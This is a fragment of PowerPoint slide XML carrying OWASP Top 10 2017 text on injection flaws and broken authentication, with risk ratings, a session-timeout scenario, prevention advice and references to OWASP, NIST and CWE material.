                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exploitability: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="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1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FEFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Prevalence: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="11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bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Detectability: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1" i="0" u="none" strike="noStrike" kern="1200"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0" kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="OpenSymbol"/>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1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Technical: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1" i="0" u="none" strike="noStrike" kern="1200"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0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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Almost any source of data can be an injection vector, environment variables, parameters, external and internal web services, and all types of users. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId24"/>
                        </a:rPr>
                        <a:t>Injection flaws</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> occur when an attacker can send hostile data to an interpreter. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="9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atin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Injection flaws</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>are very prevalent, particularly in legacy code. Injection vulnerabilities are often found in SQL, LDAP, XPath, or NoSQL queries, OS commands, XML parsers, SMTP headers, expression languages, and ORM queries. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Injection flaws are easy to discover when examining code. Scanners and fuzzers can help attackers find injection flaws.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>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rgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Injection can result in data loss, corruption, or disclosure to unauthorized parties, loss of accountability, or denial of access. Injection can sometimes lead to complete host takeover.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The business impact depends on the needs of the application and data.</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458964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4"/>
              </a:rPr>
              <a:t>Credential stuffing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, the use of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>lists of known passwords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, is a common attack. If an application does not implement automated threat or credential stuffing protections, the application can be used as a password oracle to determine if the credentials are valid.</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Most authentication attacks occur due to the continued use of passwords as a sole factor. Once considered best practices, password rotation and complexity requirements are viewed as encouraging users to use, and reuse, weak passwords. Organizations are recommended to stop these practices per NIST 800-63 and use multi-factor authentication.</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#3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Application session timeouts aren’t set properly. A user uses a public computer to access an application. Instead of selecting “logout” the user simply closes the browser tab and walks away. An attacker uses the same browser an hour later, and the user is still authenticated.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRP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Confirmation of the user's identity, authentication, and session management are critical to protect against authentication-related attacks.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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There may be authentication weaknesses if the application:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">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Permits automated attacks such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>credential stuffing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, where the attacker has a list of valid usernames and passwords.</a:t>
            </a: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Permits brute force or other automated attacks.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>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Permits default, weak, or well-known passwords, such as "Password1" or "admin/admin“.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>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Uses weak or ineffective credential recovery and forgot-password processes, such as "knowledge-based answers", which cannot be made safe.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>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Uses plain text, encrypted, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>or weakly hashed passwords </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>A3:2017-Sensitive Data Exposure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Has missing or ineffective multi-factor authentication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Exposes Session IDs in the URL (e.g., URL rewriting).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Does not rotate Session IDs after successful login.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Does not properly invalidate Session IDs. User sessions or authentication tokens (particularly single sign-on (SSO) tokens) aren’t properly invalidated during logout or a period of inactivity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>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dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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7"/>
              </a:rPr>
              <a:t>OWASP Proactive Controls: Implement Identity and Authentication Controls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1"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8"/>
              </a:rPr>
              <a:t>OWASP ASVS: V2 Authentication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9"/>
              </a:rPr>
              <a:t>V3 Session Management</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0"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Identity</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11"/>
              </a:rPr>
              <a:t>Authentication</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2"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: Authentication</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OWASP Cheat Sheet: Credential Stuffing</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4"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>Cheat Sheet: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>Forgot Password</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OWASP Cheat Sheet: Session Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:hlinkClick r:id="rId16"/>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OWASP Automated Threats Handbook</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:hlinkClick r:id="rId16"/>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7"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>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8"/>
              </a:rPr>
              <a:t>NIST 800-63b: 5.1.1 Memorized Secrets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </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9"/>
              </a:rPr>
              <a:t>CWE-287: Improper Authentication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20"/>
              </a:rPr>
              <a:t>CWE-384: Session Fixation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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Where possible, implement multi-factor authentication to prevent automated, credential stuffing, brute force, and stolen credential re-use attacks. </a:t>
            </a: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Do not ship or deploy with any default credentials, particularly for admin users.</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Implement weak-password checks, such as testing new or changed passwords against a list of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId21"/>
              </a:rPr>
              <a:t>top 10000 worst passwords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</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Align password length, complexity and rotation policies with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>NIST 800-63 B's guidelines in section 5.1.1 for Memorized Secrets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> or other modern, evidence based password policies.</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1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ensure registration, credential recovery, and API pathways are hardened against account enumeration attacks by using the same messages for all outcomes.</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1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Limit or increasingly delay failed login attempts. Log all failures and alert administrators when credential stuffing, brute force, or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>other attacks are detected.</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Tx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Use a server-side, secure,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>built-in session manager that generates a new random session ID with high entropy after login. Session IDs should not be in the URL, be securely stored and invalidated after logout, idle, and absolute timeouts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pP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Char char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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A2</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Broken Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1135431733"/>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pPr>
                        <a:buNone/>
                      </a:pPr>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rgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exploitability: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="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1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FEFFFF"/>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tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Prevalence: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Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Detectability: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kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:ea typeface="OpenSymbol"/>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a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Technical: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="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baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FEFFFF"/>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Attackers have access to hundreds of millions of valid username and password combinations for credential stuffing, default administrative account lists, automated brute force, and dictionary attack tools. Session management attacks are well understood, particularly in relation to unexpired session tokens. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>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atin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The prevalence of broken authentication is widespread due to the design and implementation of most identity and access controls. Session manage-ment is the bedrock of authentication and access controls, and is present in all stateful </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>applications</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">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en-US" sz="900">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Attackers can detect broken authentication using manual means and exploit them using automated tools with password lists and dictionary </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
